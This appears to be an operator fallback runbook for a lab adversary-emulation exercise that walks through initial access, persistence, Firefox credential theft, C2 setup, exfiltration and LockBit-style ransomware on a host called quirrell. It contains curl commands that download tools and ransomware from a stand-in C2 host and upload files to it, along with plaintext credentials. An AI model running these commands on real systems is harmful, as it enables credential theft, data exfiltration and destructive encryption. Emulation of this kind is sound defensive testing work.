# This is the ALTERNATIVE instruction set for the Scenario

Legend of symbols:

  • 💡 - callout notes
  • - extremely important note
  • ➡️ - Switching to another session
  • - Sign out of something
  • :biohazard: - Procedure for a given step

This document provides alternative steps to perform if a particular portion of a step fails to execute. Due to the nature of the scenario and its components, not every part has a corresponding alternative step, and most alternative steps will sacrifice certain parts of the scenario, in particular the emulated TTPs.

# Step 1 - Initial Access

# TightVNC Client Fails to Connect to quirrell

# :biohazard: Tier 1 Procedures

  • ➡️ Initiate an RDP session to quirrell (

    Hostname Username Password
    quirrell.decryptmalfoy.net decryptmalfoy.net\gornuk Concave-Monsieur
  • Use this RDP instead of the TightVNC for all following interactions with quirrell (

# Step 2 - Execution

# Domain Discovery Commands Fail

No alternative steps. Proceed with executing the PowerShell system services discovery command.

# PowerShell System Services Discovery Fails

# :biohazard: Tier 1 Procedures

  • In the VNC or RDP sesion to quirrell (, search for Command Prompt and right-click to Run as Administrator

  • Within the Command Prompt, execute the following to gather information about running services:

    wmic service where started=true get name, displayname, state, pathname

# Step 3 - Persistence

# Unable to Modify the Registry via GUI

  • Using the elevated Command Prompt, execute the following to modify the registry:

    reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
    reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d "gornuk" /f
    reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d "Concave-Monsieur" /f
    reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d "decryptmalfoy" /f

# Step 4 - Credential Access

# No Choco Available or Unable to Download FireFox Password Dumper

# :biohazard: Tier 1 Procedures

  • Using the elevated Command Prompt in the VNC or RDP session to quirrell (, execute the following command to download the FireFox password dumper:

    md C:\ProgramData\chocolatey\lib\FoxAdminPro\tools\
    curl http://1nvisibility-cl0ak.net/files/FoxAdminPro.exe -o C:\ProgramData\chocolatey\lib\FoxAdminPro\tools\FoxAdminPro.exe
  • Return to scenario execution of the FireFox password dumper

# FireFox Password Dumper Fails to Dump Passwords

# :biohazard: Tier 1 Procedures

  • Using the elevated Command Prompt in the VNC or RDP session to quirrell (, execute the following command to stage the FireFox data for later exfiltration

    copy C:\Users\gornuk\AppData\Roaming\Mozilla\Firefox\Profiles\ohbrdd1o.default-release\key4.db C:\users\public
    copy C:\Users\gornuk\AppData\Roaming\Mozilla\Firefox\Profiles\ohbrdd1o.default-release\logins.json C:\users\public

# Step 5 - Lateral Movement to Linux Server

No alternative steps for this.

# Step 6 - Privilege Escalation and Command & Control

# No Choco Available or Unable to Download ThunderShell

# :biohazard: Tier 1 Procedures

  • Using the elevated Command Prompt in the VNC or RDP session to quirrell (, execute the following command to download ThunderShell:

    md C:\ProgramData\chocolatey\lib\Termini\tools\
    curl http://1nvisibility-cl0ak.net/files/llfehnPxfbAg.ps1 -o C:\ProgramData\chocolatey\lib\Termini\tools\termini.ps1
  • Return to scenario execution of ThunderShell in PowerShell

# ThunderShell Fails to Execute

# :biohazard: Tier 1 Procedures

  • Continue using the elevated Command Prompt in the VNC or RDP session for the remaining scenario execution

# Step 7 - Exfiltration

# No ThunderShell Available to Execute Choco

# :biohazard: Tier 1 Procedures

  • ➡️ Initiate an RDP session to quirrell ( (if not already open)

    Username Password
    decryptmalfoy.net\gornuk Concave-Monsieur
  • If no elevated command prompt is currently open, search for Command Prompt and right-click to Run As Administrator

  • Run the following command in the command prompt to download StealBit to quirrell (

    choco install connhost
  • Run the following command in the command prompt to execute StealBit:

    connhost.exe C:\Users\ -d

# No Choco available or unable to download StealBit

# :biohazard: Tier 1 Procedures

  • Switch to the ThunderShell tab and enter the following command to download StealBit to quirrell (

    md C:\ProgramData\chocolatey\lib\Connhost\tools\
    curl http://1nvisibility-cl0ak.net/files/connhost.exe -o C:\ProgramData\chocolatey\lib\Connhost\tools\connhost.exe
    curl http://1nvisibility-cl0ak.net/files/connhost.exe -o C:\ProgramData\chocolatey\lib\Connhost\tools\sb.conf

# StealBit is unavailable or fails to execute

# :biohazard: Tier 1 Procedures

  • ➡️ Initiate an RDP session to quirrell ( (if not already open)

    Username Password
    decryptmalfoy.net\gornuk Concave-Monsieur
  • If no elevated command prompt is currently open, search for PowerShell and right-click to Run As Administrator

  • Run the following command in the PowerShell prompt on quirrell (

    whoami /all
    ipconfig /all
    cd ~;Get-ChildItem -Recurse
    curl http://1nvisibility-cl0ak.net/files/bs/portal
    curl http://1nvisibility-cl0ak.net/files/11111000011110000 --upload-file [ALTERNATIVE FILE]
  • After the file upload completes verify the file exists in the C2 server files folder. If the file exists continue to the next step.

# Step 8 - Impact

# No ThunderShell Available to Download or Execute LockBit

# :biohazard: Tier 1 Procedures

  • ➡️ Initiate an RDP session to quirrell ( (if not already open)

    Username Password
    decryptmalfoy.net\gornuk Concave-Monsieur
  • If no elevated command prompt is currently open, search for Command Prompt and right-click to Run As Administrator

  • Run the following command in the command prompt to download LockBit to quirrell (

    choco install BlockLit -y
  • Run the following command in the command prompt to execute LockBit:

    C:\ProgramData\chocolatey\lib\BlockLit\tools\main.exe -ps
  • Verify that the hosts were encrypted by checking the presence of the sk12uyqzk.README.txt ransom note in directories.

# ThunderShell Fails to Download LockBit Using Choco

# :biohazard: Tier 1 Procedures

  • Switch to the ThunderShell tab and enter the following command to download LockBit to quirrell (

    md C:\ProgramData\chocolatey\lib\BlockLit\tools\
    curl http://1nvisibility-cl0ak.net/files/bl.exe -o C:\ProgramData\chocolatey\lib\BlockLit\tools\main.exe

# LockBit Fails to Execute

# :biohazard: Tier 1 Procedures

  • If ThunderShell is available:

    • Switch to the ThunderShell tab and enter the following command to download the alternative LockBit batch script to quirrell (

      md C:\ProgramData\chocolatey\lib\BlockLit\tools\
      curl http://1nvisibility-cl0ak.net/files/bl.bat -o C:\ProgramData\chocolatey\lib\BlockLit\tools\83426913-9751-4a75-b159-65f7bf232961.bat
    • Enter the following command to download the minimal LockBit encryption executable to quirrell (

      curl http://1nvisibility-cl0ak.net/files/minimal.exe -o C:\ProgramData\chocolatey\lib\BlockLit\tools\83426913-9751-4a75-b159-65f7bf232961.min.exe
    • Enter the following command to execute the alternative batch script:

      C:\ProgramData\chocolatey\lib\BlockLit\tools\83426913-9751-4a75-b159-65f7bf232961.bat C:\ProgramData\chocolatey\lib\BlockLit\tools\83426913-9751-4a75-b159-65f7bf232961.min.exe
  • If ThunderShell is not available:

    • Open an elevated command prompt and run the following command to download the alternative LockBit batch script to quirrell (

      md C:\ProgramData\chocolatey\lib\BlockLit\tools\
      curl http://1nvisibility-cl0ak.net/files/bl.bat -o C:\ProgramData\chocolatey\lib\BlockLit\tools\83426913-9751-4a75-b159-65f7bf232961.bat
    • Enter the following command to download the minimal LockBit encryption executable to quirrell (

      curl http://1nvisibility-cl0ak.net/files/minimal.exe -o C:\ProgramData\chocolatey\lib\BlockLit\tools\83426913-9751-4a75-b159-65f7bf232961.min.exe
    • Enter the following command to execute the alternative batch script:

      C:\ProgramData\chocolatey\lib\BlockLit\tools\83426913-9751-4a75-b159-65f7bf232961.bat C:\ProgramData\chocolatey\lib\BlockLit\tools\83426913-9751-4a75-b159-65f7bf232961.min.exe
  • Verify that the hosts were encrypted by checking the presence of the sk12uyqzk.README.txt ransom note in directories.

  • Verify activity failure or success by looking at terminal output and at the C:\Windows\temp\bl.bat.log log file on affected hosts.